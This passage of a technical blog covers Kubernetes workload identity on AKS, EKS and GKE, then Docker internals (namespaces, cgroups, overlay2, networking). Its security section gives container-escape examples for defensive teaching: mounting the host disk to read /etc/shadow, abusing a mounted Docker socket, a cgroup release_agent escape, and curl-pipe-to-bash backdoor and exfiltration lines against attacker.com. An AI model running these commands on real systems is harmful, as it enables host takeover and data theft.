  --role="roles/storage.objectViewer"

# 4. Create the IAM policy binding between the Kubernetes SA and GCP SA
gcloud iam service-accounts add-iam-policy-binding \
  gcs-access-sa@PROJECT_ID.iam.gserviceaccount.com \
  --role="roles/iam.workloadIdentityUser" \
  --member="serviceAccount:PROJECT_ID.svc.id.goog[default/gke-workload-identity-sa]"

Key Configuration Points:

Workload Identity Pool: Format is PROJECT_ID.svc.id.goog
Member Binding: Must match serviceAccount:PROJECT_ID.svc.id.goog[<namespace>/<ksa-name>]
Role: The GCP service account needs roles/iam.workloadIdentityUser for the K8s SA

The member format breaks down as:

PROJECT_ID.svc.id.goog - Your workload identity pool
[default/gke-workload-identity-sa] - [namespace/kubernetes-service-account]

GKE Workload Identity Setup

apiVersion: v1
kind: ServiceAccount
metadata:
  name: gke-workload-identity-sa
  namespace: default
  annotations:
    iam.gke.io/gcp-service-account: my-gsa@PROJECT_ID.iam.gserviceaccount.com
---
apiVersion: v1
kind: Pod
metadata:
  name: gke-workload-identity-demo
  namespace: default
spec:
  serviceAccountName: gke-workload-identity-sa
  containers:
  - name: app
    image: google/cloud-sdk:slim
    command: ["sleep", "infinity"]
    # Note: GKE Workload Identity automatically configures the GCP metadata server
    # in the pod. Application Default Credentials (ADC) will automatically work
    # without needing explicit volume mounts or environment variables.

How it works in GKE:

Note on GKE and Projected Volumes: Unlike AKS and EKS, GKE's Workload Identity primarily works through metadata server emulation. You can optionally use projected service account tokens with a specific audience if you need direct access to the Kubernetes token, but this is rarely necessary. Most applications using Google Cloud client libraries will authenticate automatically through the metadata server without any explicit volume configuration.

Cloud Provider Comparison

Trust Relationship Overview

All three cloud providers use a similar pattern: establishing trust between the Kubernetes service account and cloud provider IAM system through OIDC federation.

Provider-Specific Comparison

Feature	AKS	EKS	GKE
Trust Mechanism	Federated Identity Credential	IAM OIDC Provider + Trust Policy	Workload Identity Pool Binding
Subject Format	`system:serviceaccount:ns:sa`	`system:serviceaccount:ns:sa`	`serviceAccount:PROJECT.svc.id.goog[ns/sa]`
Audience	`api://AzureADTokenExchange`	`sts.amazonaws.com`	`https://iam.googleapis.com/...`
K8s Annotation	`azure.workload.identity/client-id`	`eks.amazonaws.com/role-arn`	`iam.gke.io/gcp-service-account`
Pod Label Required	`azure.workload.identity/use: "true"`	No	No
Auto-Injection	Yes (via webhook)	Yes (via webhook)	Yes (metadata server)
Env Variables Injected	`AZURE_CLIENT_ID`, `AZURE_TENANT_ID`, etc.	`AWS_ROLE_ARN`, `AWS_WEB_IDENTITY_TOKEN_FILE`	None (uses metadata server)
Volume Auto-Mount	Yes	Yes	Typically not needed
Cloud IAM Setup	Federated credential on App/MI	IAM Role with trust policy	IAM binding with workloadIdentityUser

Key Benefits Across All Platforms

No Long-Lived Credentials: Tokens expire automatically, reducing security risk
Automatic Rotation: The kubelet handles token refresh transparently
Fine-Grained Access: Audience scoping limits token usage
Cloud Integration: Seamless authentication to cloud provider services
Least Privilege: Each pod gets only the permissions it needs

Best Practices

Set appropriate expiration times: Balance between security (shorter) and performance (fewer rotations)
Use specific audiences: Scope tokens to their intended use
Monitor token usage: Track authentication patterns for security insights
Follow cloud provider guides: Each platform has specific setup requirements
Test token rotation: Ensure your applications handle token refresh gracefully

Conclusion

Projected service account tokens represent a significant security improvement in Kubernetes authentication. Whether you're running on AKS, EKS, or GKE, understanding how these tokens work enables you to build secure, cloud-native applications that follow the principle of least privilege without managing long-lived credentials.

The integration with cloud provider IAM systems makes projected tokens essential for modern Kubernetes workloads, providing a secure bridge between your containerized applications and cloud services.

Originally published at - https://platformwale.blog

How Docker Actually Works: A Deep Dive into the Internals

Piyush Jajoo — Thu, 05 Feb 2026 03:54:13 +0000

Most developers treat Docker as a black box — you write a Dockerfile, run docker up, and things just work. But what's actually happening under the hood? This post tears the curtain back and walks through every layer: from the CLI all the way down to Linux kernel primitives that make isolation possible.

The Big Picture
The Docker CLI and Client
The Docker Daemon (dockerd)
Images: Layered Filesystems
The Container Runtime: containerd and runc
Linux Namespaces: Isolation
cgroups: Resource Control
Union Filesystems and Storage Drivers
Networking Internals
The Full Lifecycle: Start to Finish
Security Surface and Attack Vectors
Docker vs. Podman vs. nerdctl vs. Kata Containers
Summary and Key Takeaways

1. The Big Picture

Before we descend into internals, it helps to have a map. Docker is not a single program — it's a stack of cooperating components. Each layer has a distinct job.

Every docker run command you've ever typed travels through this entire stack. Let's walk it top to bottom.

2. The Docker CLI and Client

The docker command you type in your terminal is just a client. It does almost nothing by itself — it serializes your intent into REST API calls and forwards them to the daemon.

Key facts about the CLI:

Communication happens over a Unix domain socket (/var/run/docker.sock), not TCP, for local interactions. This is why Docker commands feel instantaneous — there's no network round-trip.
The CLI speaks the Docker Engine API (a versioned REST API). You can call it directly with curl if you want: curl --unix-socket /var/run/docker.sock http://localhost/images/json.
The CLI is open source and replaceable. Tools like Podman, Buildx, and Docker Compose are all just different clients talking to compatible backends.

3. The Docker Daemon (dockerd)

The daemon is the brain. It's a long-running background process that manages the entire lifecycle of containers, images, volumes, and networks.

The daemon doesn't actually run containers itself anymore. That's a critical architectural decision made in 2017 — Docker extracted the container runtime into containerd (see Section 5). The daemon now acts as an orchestrator sitting above containerd, handling the higher-level logic like image pulls, build context, log streaming, and networking setup.

4. Images: Layered Filesystems

A Docker image is not a single monolithic file. It's a stack of read-only layers, each representing a single filesystem change made by a Dockerfile instruction. This is the foundation of Docker's efficiency.

4.1 How Layers Are Built

Each instruction in a Dockerfile that modifies the filesystem creates a new layer:

FROM ubuntu:22.04          # Layer 0: Base image (multiple layers itself)
RUN apt-get update         # Layer 1: Updated package index
RUN apt-get install -y nginx  # Layer 2: Nginx binaries + deps
COPY ./app /opt/app        # Layer 3: Your application code
CMD ["nginx", "-g", "daemon off;"]  # Metadata only — no new layer

4.2 Layer Sharing and The Content-Addressable Store

Every layer is identified by its SHA-256 hash of its contents. This gives Docker two powerful properties:

Deduplication: If two images share the same ubuntu:22.04 base, the layers on disk are stored only once. The hash is the same, so Docker knows they're identical.

Shared caching: When you rebuild an image and only change Layer 3, Docker reuses Layers 0–2 from cache. It only needs to rebuild from the point of change.

Notice how v1 and v2 share the first three layers (ubuntu base, apt-get update, nginx install). Only the final layer differs (app v1 vs. app v2). This is why docker pull is so fast for incremental updates — it only fetches the delta.

4.3 The OCI Image Manifest

When you pull an image, what actually comes over the wire is an OCI Image Manifest — a JSON document that lists all the layers, their hashes, and the image config:

{
  "schemaVersion": 2,
  "mediaType": "application/vnd.oci.image.manifest.v1+json",
  "config": {
    "mediaType": "application/vnd.oci.image.config.v1+json",
    "digest": "sha256:aaa...",
    "size": 7023
  },
  "layers": [
    { "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
      "digest": "sha256:abc1...", "size": 73400320 },
    { "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
      "digest": "sha256:def2...", "size": 15728640 },
    { "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
      "digest": "sha256:ghi3...", "size": 47185920 },
    { "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
      "digest": "sha256:jkl4...", "size": 5242880 }
  ]
}

The config blob contains the runtime metadata: environment variables, the entrypoint command, exposed ports, working directory, and the history of how each layer was built.

5. The Container Runtime: containerd and runc

This is where Docker hands off actual container creation to the Linux kernel. The runtime stack has two tiers.

containerd (High-Level Runtime)

containerd is a daemon that manages the lifecycle of containers at a level just above the kernel. It's responsible for:

Pulling and unpacking images into snapshots on disk
Managing snapshots via the storage driver (e.g., overlay2)
Invoking runc to actually create and start containers
Exposing a gRPC API that dockerd (and Kubernetes, via the CRI interface) uses

containerd is a CNCF graduated project — it's the same runtime Kubernetes uses under the hood. This is why you can swap Docker for containerd directly in production clusters.

runc (Low-Level Runtime)

runc is a tiny (~5MB) binary that does the actual heavy lifting of talking to the kernel. When you ask for a new container, runc does the following in sequence:

Reads the OCI runtime spec — a config.json generated by containerd that describes the desired container state
Calls clone() with namespace flags — this is the single syscall that creates a new process inside isolated namespaces
Sets up cgroups — attaches the new process to resource-limiting control groups
Mounts the filesystem — sets up the overlay filesystem, bind mounts, and the /proc and /sys pseudo-filesystems
Drops privileges — removes capabilities the container doesn't need
Execs the entrypoint — replaces itself with PID 1 inside the container

6. Linux Namespaces: Isolation

Namespaces are the kernel feature that makes containers feel like separate machines. Each namespace type isolates a different aspect of the OS. A container typically lives inside seven namespaces simultaneously.

Namespace Breakdown

Namespace	Isolates	What Happens Inside the Container
PID	Process IDs	Container's first process is always PID 1. It can't see or signal host processes.
NET	Network interfaces, routing tables, iptables	Container gets its own virtual NIC, its own IP, its own loopback.
MNT	Mount points	Container has its own filesystem tree. Host mounts are invisible.
UTS	Hostname & domain name	`hostname` returns the container's name, not the host's.
IPC	Inter-process communication (shared memory, semaphores, message queues)	Containers can't read each other's `/dev/shm`.
USER	User and group IDs	Maps container's root (UID 0) to an unprivileged host UID. Critical for security.
CGROUP	cgroup hierarchy view	Container sees only its own cgroup subtree, so it can't inspect resource limits of sibling containers.

The PID namespace is particularly elegant. When PID 1 inside a container exits, the entire container stops — just like how killing PID 1 on a real Linux machine shuts everything down. This is why your entrypoint process matters so much.

7. cgroups: Resource Control

While namespaces provide isolation (what you can see), cgroups provide control (what you can use). cgroups (control groups) are a Linux kernel feature that lets you partition system resources among processes.

Docker uses cgroups v2 (the unified hierarchy) on modern systems.

How Docker Maps Your Flags to cgroups

When you run:

docker run --cpus=0.5 --memory=512m --pids-limit=50 my-app

Docker translates these into cgroup filesystem writes:

Docker Flag	cgroup File	Value Written
`--cpus=0.5`	`cpu.max`	`50000 100000` (50ms per 100ms period)
`--memory=512m`	`memory.max`	`536870912` (bytes)
`--memory-swap=0`	`memory.swap.max`	`0`
`--pids-limit=50`	`pids.max`	`50`
`--blkio-weight=100`	`io.weight`	`100`

The kernel enforces these limits. If a container tries to allocate more memory than memory.max, the kernel's OOM killer kicks in and terminates the offending process. The container doesn't crash silently — it gets a 137 (SIGKILL) exit code.

8. Union Filesystems and Storage Drivers

Here's the problem: Docker images are read-only (they're just layers stacked on top of each other), but containers need to write files (logs, temp files, config changes). How do you let a container modify files without breaking the original image?

The solution is overlay2 — think of it like transparent sheets stacked on top of each other.

8.1 The Transparent Sheets Analogy

Imagine you have a stack of transparent sheets:

Bottom sheets (read-only): These are the Docker image layers. They contain /bin/bash, /usr/sbin/nginx, etc. You can look through them but you can't write on them.
Top sheet (writable): This is created fresh for each container. When you start a container, Docker puts a blank writable sheet on top.

When you look down from above, you see all the sheets merged together — this is what the container sees as its filesystem (/).

8.2 Three Scenarios: Read, Write, Delete

Let's walk through what happens when a container interacts with files:

Scenario 1: Reading an existing file

# Inside the container
cat /bin/bash

The file exists in the lower (image) layers
overlay2 reads it directly from there
No copying, instant access
Multiple containers reading the same file? They all read the same disk blocks — zero duplication

Scenario 2: Modifying an existing file

# Inside the container
echo "listen 8080;" >> /etc/nginx/nginx.conf

Here's where copy-on-write happens:

First: The file /etc/nginx/nginx.conf exists in the lower (image) layer
Container tries to write: overlay2 intercepts this
Copy entire file up: The whole file gets copied from the lower layer to the upper (writable) layer
Modify the copy: The container writes to the copy in the upper layer
Future reads: The container now sees the modified version (upper layer wins)

The original file in the lower layer is never touched — it stays pristine. When you stop and delete the container, the upper layer is destroyed. The image is unchanged.

Scenario 3: Creating a new file

# Inside the container
echo "Hello" > /opt/app/new-file.txt

This file doesn't exist in the image layers
It's created directly in the upper (writable) layer
Only this container sees it
When the container is deleted, the file vanishes

Scenario 4: Deleting a file that exists in the image

# Inside the container  
rm /etc/old-config

The file exists in the lower (image) layer — you can't actually delete it (it's read-only)
Instead, overlay2 creates a special whiteout file in the upper layer: .wh.old-config
When the kernel sees the whiteout file, it hides the original file from the lower layer
The container thinks the file is deleted, but it still exists in the image layer

8.3 Why This Matters

This design gives Docker three critical properties:

1. Disk efficiency: Starting 100 containers from the same image uses almost zero extra disk space initially. They all share the same read-only image layers. Only the writable upper layer (which starts empty) is unique per container.

2. Fast startup: No need to copy the entire filesystem — just create an empty upper layer and you're ready to go.

3. Image immutability: The original image layers are never modified. You can run a container, mess it up completely, delete it, and start fresh from the exact same image — nothing is corrupted.

8.4 The Full Picture

Here's how overlay2 actually mounts the filesystem:

# Simplified version of what Docker does behind the scenes
mount -t overlay overlay \
  -o lowerdir=/var/lib/docker/overlay2/l/LAYER1:/var/lib/docker/overlay2/l/LAYER2 \
  -o upperdir=/var/lib/docker/overlay2/abc123/diff \
  -o workdir=/var/lib/docker/overlay2/abc123/work \
  /var/lib/docker/overlay2/abc123/merged

lowerdir: The read-only image layers (colon-separated list)
upperdir: The writable layer for this specific container
workdir: Temporary scratch space overlay2 uses internally (you can ignore this)
merged: Where the unified view appears — this is what the container sees as /

When the container is deleted, Docker just removes the upperdir and workdir directories. The lowerdir (image layers) stay intact and can be reused immediately for the next container.

9. Networking Internals

Docker containers are isolated in their own network namespace — they have their own network stack, their own IP address, their own routing table. But how does traffic from the outside world reach them? And how do containers talk to each other?

The answer involves four key components working together like a postal system.

9.1 The Four Components

Think of Docker networking like a building's internal mail system:

veth pairs — Virtual cables connecting the container to the host (like a mail slot in each apartment door)
docker0 bridge — A virtual network switch that connects all containers (like the building's mailroom)
iptables DNAT — Rewrites destination addresses for incoming packets (like the front desk forwarding mail to apartments)
iptables SNAT — Rewrites source addresses for outgoing packets (like the building's return address on all outgoing mail)

9.2 The Big Picture: How Traffic Flows

Let's trace what happens when someone accesses your containerized nginx server with docker run -p 8080:80 nginx:

9.3 Step-by-Step: What Happens with `-p 8080:80`

Let's break down the journey of a single HTTP request step by step.

Setup (happens once at container start):

When you run docker run -p 8080:80 nginx, Docker does this:

Creates a veth pair — Two virtual network interfaces connected like a pipe. One end (veth1a2b3c) stays on the host, the other (eth0) goes into the container's network namespace.
Attaches the host end to docker0 — The docker0 bridge is a virtual Layer 2 switch. All container veth pairs plug into it, like devices plugged into a physical switch.
Assigns an IP to the container — The container's eth0 gets an IP from the bridge's subnet, usually 172.17.0.2/16. The bridge itself is 172.17.0.1.
Adds iptables rules:
- DNAT rule (PREROUTING chain): "If a packet arrives at port 8080, rewrite its destination to 172.17.0.2:80"
- SNAT rule (POSTROUTING chain): "If a packet from 172.17.0.0/16 is leaving the host, rewrite its source to the host's IP"

Request path (inbound traffic):

Now someone visits http://192.168.1.10:8080 from the internet:

① Packet arrives at host NIC

Source:      203.0.113.5:54321 (external client)
Destination: 192.168.1.10:8080 (host's public IP and exposed port)

② iptables DNAT rewrites destination

The PREROUTING rule fires:
-A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 172.17.0.2:80

Packet becomes:
Source:      203.0.113.5:54321 (unchanged)
Destination: 172.17.0.2:80 (container's IP and port)

③ Packet routed to docker0 bridge

The kernel's routing table sees destination 172.17.0.2 is on the docker0 subnet. It forwards the packet to the bridge.

④ Bridge forwards to correct veth

The bridge has learned which container has IP 172.17.0.2 (via ARP). It forwards the packet out the correct veth pair.

⑤ Packet arrives at container's eth0

Inside the container's network namespace, nginx sees:

Incoming connection from 203.0.113.5:54321 to 172.17.0.2:80

Nginx processes the request and sends a response.

Response path (outbound traffic):

⑥ Response leaves container

Source:      172.17.0.2:80 (container)
Destination: 203.0.113.5:54321 (original client)

⑦ Packet crosses veth pair to bridge

The container's default gateway is 172.17.0.1 (the bridge). Packet goes back through the veth pair to the host.

⑧ iptables SNAT rewrites source

The POSTROUTING rule fires:
-A POSTROUTING -s 172.17.0.0/16 ! -o docker0 -j MASQUERADE

This rule means: "For any packet from the 172.17.0.0/16 subnet (the docker0 bridge network)
that's NOT going out the docker0 interface (! -o docker0), apply MASQUERADE"

In our case, the packet from 172.17.0.2 matches this rule.

Packet becomes:
Source:      192.168.1.10:34567 (host's IP with a random high port chosen by kernel)
Destination: 203.0.113.5:54321 (unchanged)

What is 172.17.0.0/16? This is subnet notation (CIDR) representing the entire IP range that docker0 manages:

172.17.0.1 — docker0 bridge (gateway)
172.17.0.2 — Our container
172.17.0.3-255.255 — Other possible container IPs
172.17.0.0/16 — The whole subnet (all of the above)

Why SNAT? The external client sent the request to 192.168.1.10:8080. If the response came back from 172.17.0.2:80 (a private IP it's never heard of), the client's firewall would drop it as unsolicited traffic. SNAT rewrites the source to the host's IP.

The kernel maintains a connection tracking table (conntrack) that remembers:

Inbound: Client's packet to 192.168.1.10:8080 was DNATed to 172.17.0.2:80
Outbound: Container's response from 172.17.0.2:80 is SNATed to 192.168.1.10:34567

When the response packet reaches the client, conntrack ensures the client sees it as coming from the same endpoint it originally contacted (192.168.1.10:8080), making the whole exchange appear as a normal TCP connection.

⑨ Response sent to client

From the client's perspective, it had a normal TCP conversation with 192.168.1.10:8080. It has no idea a container was involved.

9.4 Container-to-Container Communication

When two containers on the same host talk to each other, it's much simpler — no NAT required:

Container A sends a packet to 172.17.0.3 (Container B's IP)
The packet goes through A's veth pair to the docker0 bridge
The bridge sees the destination MAC address (learned via ARP) and forwards directly to B's veth pair
Packet arrives at Container B — no address translation needed

This is why containers on the same Docker network can talk to each other using their container names as hostnames — Docker runs an embedded DNS server that resolves container names to their bridge IPs.

9.5 Why This Design?

This architecture gives Docker:

Isolation: Each container has its own network stack. One container can't sniff traffic from another (different network namespaces).

Portability: Containers always see themselves with the same internal IP (e.g., 172.17.0.2), regardless of what host IP they're running on.

Flexibility: You can expose different host ports (8080, 8081, 8082) all pointing to the same container port (80), allowing multiple containers to run the same service.

Performance: Container-to-container traffic never leaves the host — it's just a memory copy through the bridge. No network stack overhead.

The docker0 bridge is created automatically when Docker starts. You can see it with ip addr show docker0 on the host. Every running container gets a veth pair, and brctl show docker0 will list all the attached interfaces.

10. The Full Lifecycle: Start to Finish

Now let's put it all together. When you type docker run -p 8080:80 nginx, what actually happens? The answer involves five distinct phases, each handled by a different part of the stack.

10.1 The Five Phases

10.2 Phase-by-Phase Breakdown

Let's trace exactly what each component does.

Phase 1: Image Resolution (dockerd → Registry)

You:     docker run -p 8080:80 nginx
CLI:     Sends REST API call to dockerd
dockerd: "Do I have nginx:latest locally?"
         → Check local image cache
         → Missing! Need to pull from registry

dockerd → Registry:  GET /v2/library/nginx/manifests/latest
Registry → dockerd:  Here's the OCI manifest with 6 layer digests

dockerd: "Which layers do I already have?"
         → Check: sha256:abc123... ✅ (have it - ubuntu base)
         → Check: sha256:def456... ❌ (missing)
         → Check: sha256:789abc... ❌ (missing)

dockerd → Registry:  GET /v2/library/nginx/blobs/sha256:def456...
Registry → dockerd:  [compressed layer tarball]

dockerd: Unpacks layers to /var/lib/docker/overlay2/
         → Verifies SHA-256 checksums
         → Decompresses tarballs
         → Stores in content-addressable storage

Phase 2: Container Setup (dockerd → containerd)

dockerd → containerd: "Create a container from nginx:latest"
                      Here's the config: { Image: "nginx", Ports: {"80/tcp": {}} }

containerd: Generates OCI runtime specification (config.json):
            {
              "root": { "path": "/path/to/overlay2/merged" },
              "process": { "args": ["nginx", "-g", "daemon off;"] },
              "linux": {
                "namespaces": [
                  { "type": "pid" }, { "type": "network" }, ...
                ],
                "resources": { "memory": { "limit": -1 } }
              }
            }

containerd: Prepares overlay2 mount:
            - lowerdir: nginx image layers (read-only)
            - upperdir: /var/lib/docker/overlay2/abc123/diff (writable)
            - workdir:  /var/lib/docker/overlay2/abc123/work
            - merged:   /var/lib/docker/overlay2/abc123/merged (what container sees)

containerd → runc: "Create container with this config.json"

Phase 3: Kernel-Level Isolation (runc → Linux Kernel)

runc: Reads config.json
      → Time to talk to the kernel

runc → kernel: clone(CLONE_NEWPID | CLONE_NEWNET | CLONE_NEWNS | 
                     CLONE_NEWUTS | CLONE_NEWIPC | CLONE_NEWUSER |
                     CLONE_NEWCGROUP)
               "Create a new process with 7 isolated namespaces"

kernel: Creates namespace structures
        → New PID namespace: container's processes start at PID 1
        → New NET namespace: empty network stack
        → New MNT namespace: isolated filesystem view
        → (and 4 others...)

runc → kernel: Write cgroup limits to /sys/fs/cgroup/
               - cpu.max = 100000 (no limit)
               - memory.max = 536870912 (512 MiB)
               - pids.max = unlimited

runc → kernel: mount("overlay", "/var/lib/docker/overlay2/abc123/merged", ...)
               "Mount the overlay filesystem as the container's root"

runc → kernel: mount("proc", "/proc", "proc")
               mount("sysfs", "/sys", "sysfs")
               "Mount pseudo-filesystems inside container"

runc → kernel: prctl(PR_CAPBSET_DROP, CAP_SYS_ADMIN)
               "Drop dangerous capabilities - container can't break out"

Phase 4: Networking (dockerd → Linux Kernel)

dockerd: "Container created, now set up networking"

dockerd → kernel: ip link add veth0 type veth peer name veth1a2b3c
                  "Create a virtual ethernet cable (veth pair)"

dockerd → kernel: ip link set veth1a2b3c master docker0
                  "Plug host-end into the docker0 bridge"

dockerd → kernel: ip link set veth0 netns <container-pid>
                  "Move container-end into container's network namespace"

dockerd → kernel: (inside container namespace)
                  ip addr add 172.17.0.2/16 dev veth0
                  ip link set veth0 up
                  ip route add default via 172.17.0.1
                  "Configure container's network: IP, gateway, routes"

dockerd → kernel: iptables -t nat -A PREROUTING -p tcp --dport 8080 \
                           -j DNAT --to-destination 172.17.0.2:80
                  "Add port forwarding rule: 8080 → container:80"

dockerd → kernel: iptables -t nat -A POSTROUTING -s 172.17.0.0/16 \
                           ! -o docker0 -j MASQUERADE
                  "Add SNAT rule for outbound traffic"

Phase 5: Process Launch (runc → Container)

runc: Everything is ready - namespaces, cgroups, filesystem, network
      → Time to start the actual application

runc → kernel: execve("/usr/sbin/nginx", ["nginx", "-g", "daemon off;"])
               "Replace this process with nginx"

kernel: Inside the container:
        → PID 1 is now nginx (not init!)
        → Sees only its own process tree
        → Sees only its own network interfaces (eth0 = 172.17.0.2)
        → Sees only its own filesystem (overlayfs merged view)

nginx: Starts listening on 0.0.0.0:80 (inside the container)

nginx → kernel: bind(sockfd, { 0.0.0.0:80 })
kernel: "Bound to port 80 in this network namespace"

runc → containerd: "Container is running, PID 1 active"
containerd → dockerd: "Container abc123 status: running"
dockerd → CLI: { "Id": "abc123...", "Status": "running" }
CLI → You: abc123def456...

10.3 The Complete Timeline

Here's how fast it all happens:

Time	What's Happening
0ms	You press Enter on `docker run`
5ms	CLI sends REST call to dockerd
10-200ms	Phase 1: Image pull (if needed) - can be ~0ms if cached
210ms	Phase 2: containerd generates config
220ms	Phase 3: runc creates namespaces & cgroups
240ms	Phase 4: Network setup (veth, bridge, iptables)
250ms	Phase 5: execve("nginx") - PID 1 starts
270ms	nginx binds to port 80
300ms	nginx is serving traffic
~500ms	Total time (cold start with image pull)

If the image is already cached, the cold-start time drops to ~100ms — just the namespace creation and process launch.

Compare this to a VM:

Boot time: 20-60 seconds
Memory overhead: 512MB minimum for guest OS
Disk overhead: Full OS image (1-10GB)

Docker's speed comes from not booting an OS. It's just process isolation with namespace boundaries — the kernel is already running.

11. Security Surface and Attack Vectors

Understanding internals means understanding where things can go wrong. The container boundary is enforced by kernel features, not by a hypervisor. This is both Docker's strength (speed, efficiency) and its weakness (shared kernel = shared attack surface).

Every security discussion about containers comes down to one fundamental question: What happens if a malicious process inside a container tries to break out?

11.1 The Threat Landscape

The security model is defense in depth — multiple layers that must all be bypassed for a successful container escape.

11.2 Attack Vector 1: Privileged Mode (`--privileged`)

What it is:

docker run --privileged malicious-image

What it does: Disables every single security boundary we've discussed:

✅ Namespaces still exist, but capabilities are not dropped
✅ cgroups still limit resources, but not access
❌ All capabilities granted (CAP_SYS_ADMIN, CAP_NET_ADMIN, etc.)
❌ /dev is fully exposed (block devices, hardware)
❌ seccomp disabled
❌ AppArmor/SELinux disabled

The attack:

# Inside a privileged container
mkdir /mnt/host
mount /dev/sda1 /mnt/host  # Mount the host's root filesystem
chroot /mnt/host           # Change root to host filesystem
# You're now effectively root on the host
cat /etc/shadow            # Read host passwords

Why it works: With CAP_SYS_ADMIN and full /dev access, the attacker can mount the host's block devices and access the entire filesystem. The namespace boundary becomes meaningless.

Defense: Never use --privileged in production. If you need specific capabilities (e.g., CAP_NET_ADMIN for network tools), grant them individually:

docker run --cap-add=NET_ADMIN --cap-drop=ALL my-image

11.3 Attack Vector 2: Kernel Vulnerabilities (Shared Kernel)

The fundamental problem: All containers share the host's kernel. A kernel exploit in one container = full host compromise.

Real-world example: CVE-2019-5736 (runc escape)

This was a critical vulnerability in runc itself. Here's how it worked:

# Attacker prepares a malicious container entrypoint
# The entrypoint overwrites /proc/self/exe (which points to runc on the host)

# When the container starts:
# 1. dockerd calls runc to launch the container
# 2. runc forks and execs the container's entrypoint
# 3. The malicious entrypoint overwrites /proc/self/exe
# 4. Because /proc/self/exe is a symlink to the runc binary on the host...
# 5. The attacker has now overwritten the host's runc binary
# 6. Next time anyone runs 'docker exec', the malicious runc executes on the host

Why it works: /proc/self/exe is a special symlink that points to the currently executing binary. For runc, this points to the host's /usr/bin/runc. Because the attacker had write access to this symlink from inside the container, they could overwrite the host binary.

Defense mechanisms:

1. seccomp profiles — Whitelist only the syscalls the container actually needs:

{
  "defaultAction": "SCMP_ACT_ERRNO",
  "syscalls": [
    { "names": ["read", "write", "open", "close", "stat"], "action": "SCMP_ACT_ALLOW" },
    { "names": ["mount", "ptrace", "reboot"], "action": "SCMP_ACT_ERRNO" }
  ]
}

Docker's default seccomp profile blocks ~44 dangerous syscalls including:

mount / umount
reboot / sethostname
ptrace (process tracing)
keyctl (kernel key management)

2. Keep kernel & runtime updated: CVE-2019-5736 was patched in runc 1.0-rc7. The fix was simple: mark /proc/self/exe as read-only.

11.4 Attack Vector 3: Mounted Docker Socket

What it is:

docker run -v /var/run/docker.sock:/var/run/docker.sock attacker-image

What it does: Gives the container full control over the Docker daemon.

The attack:

# Inside the container with the socket mounted
apk add docker-cli  # Install Docker CLI inside container

# Now the attacker can create their own privileged container
docker run -v /:/host --privileged -it alpine sh

# This new container has:
# - Full access to host filesystem (mounted at /host)
# - --privileged mode (all capabilities)
# - Running as root on the host

Why it works: The Docker socket is the control plane. Anyone who can write to /var/run/docker.sock can instruct the daemon to create containers with arbitrary configurations — including privileged containers, bind mounts of the host filesystem, and more.

Defense:

Never mount the Docker socket into untrusted containers
If you must (e.g., for CI/CD tools like Portainer, Traefik), use socket proxies that filter allowed API calls:

  # Use tecnativa/docker-socket-proxy to restrict allowed operations
  docker run -v /var/run/docker.sock:/var/run/docker.sock \
             -e CONTAINERS=1 -e POST=0 \
             tecnativa/docker-socket-proxy

11.5 Attack Vector 4: Dangerous Capabilities

Linux capabilities break down root's powers into ~40 distinct privileges. By default, Docker drops most of them, but some workloads require specific capabilities back.

Dangerous capabilities:

CAP_SYS_ADMIN — The "god mode" capability. Allows:

Mounting filesystems
Creating namespaces
Loading kernel modules
Basically everything that defines "root"

Attack with CAP_SYS_ADMIN:

# Container started with --cap-add=SYS_ADMIN
mkdir /mnt/cgroup
mount -t cgroup -o memory memory /mnt/cgroup
echo $$ > /mnt/cgroup/release_agent  # Escape via cgroup release_agent

CAP_SYS_PTRACE — Allows attaching to any process:

# Attach to dockerd or another container's PID 1
gdb -p <dockerd-pid>
# Inject shellcode, steal secrets, modify memory

CAP_NET_ADMIN — Network configuration:

# Create network namespaces, sniff traffic
ip netns add attacker
# Modify iptables rules
iptables -F  # Flush all rules

Defense:

# Start with nothing, add only what's needed
docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE my-image

# Audit what capabilities your containers actually use
docker inspect <container> | jq '.[].HostConfig.CapAdd'

11.6 Attack Vector 5: Supply Chain (Compromised Images)

The scenario: You run docker pull nginx and execute code you've never audited.

What could go wrong:

Backdoored base images:

# Looks innocent
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y nginx

# But the Dockerfile also did this:
RUN curl http://attacker.com/backdoor.sh | bash
RUN echo "* * * * * curl http://attacker.com/exfil.sh | bash" > /etc/cron.d/exfil

Crypto miners: Many compromised images quietly mine cryptocurrency, consuming CPU that you pay for in cloud bills.

Data exfiltration: The container can read environment variables (docker run -e DATABASE_PASSWORD=secret), mounted volumes, and make outbound network connections.

Defense layers:

1. Image scanning: Scan for known CVEs before running:

# Using Trivy (open source)
trivy image nginx:latest

# Example output:
# nginx:latest (ubuntu 22.04)
# Total: 24 (CRITICAL: 2, HIGH: 8, MEDIUM: 14)
# CVE-2023-1234 | CRITICAL | openssl | 3.0.2-0ubuntu1 | Buffer overflow

2. Content trust / image signing:

# Enable Docker Content Trust
export DOCKER_CONTENT_TRUST=1

# Only pull images signed with trusted keys
docker pull nginx:latest
# Error: No trust data for latest

3. Use distroless or minimal base images:

# Instead of ubuntu (72MB with shell, package manager, etc.)
FROM gcr.io/distroless/base-debian11  # 20MB, no shell, no package manager

COPY my-app /app
CMD ["/app"]

Why? No shell = attacker can't run curl | bash even if they compromise the app.

4. Run as non-root user:

FROM ubuntu:22.04
RUN useradd -u 1001 -m appuser
USER appuser
CMD ["./my-app"]

Now if the app is compromised, the attacker is UID 1001, not root.

11.7 Defense in Depth: How the Layers Work Together

Here's a concrete example of how multiple defenses stop an attack:

Scenario: An attacker exploits an RCE vulnerability in your web app running in a container.

Step 1: Attacker gets code execution inside container
        → They're running as UID 1001 (non-root user)

Step 2: Attacker tries: mount /dev/sda1 /mnt
        → BLOCKED by capabilities (no CAP_SYS_ADMIN)

Step 3: Attacker tries: docker run --privileged (via mounted socket)
        → BLOCKED - no Docker socket mounted

Step 4: Attacker tries: apt-get install nmap
        → BLOCKED - running distroless image (no package manager)

Step 5: Attacker tries: reboot
        → BLOCKED by seccomp (reboot syscall not allowed)

Step 6: Attacker tries: while true; do :; done &  (fork bomb)
        → BLOCKED by cgroups (pids.max = 100)

Step 7: Attacker tries: dd if=/dev/zero of=/file bs=1G count=100
        → BLOCKED by cgroups (disk I/O limits)

Step 8: Attacker tries: curl http://attacker.com/exfil < /app/secrets.txt
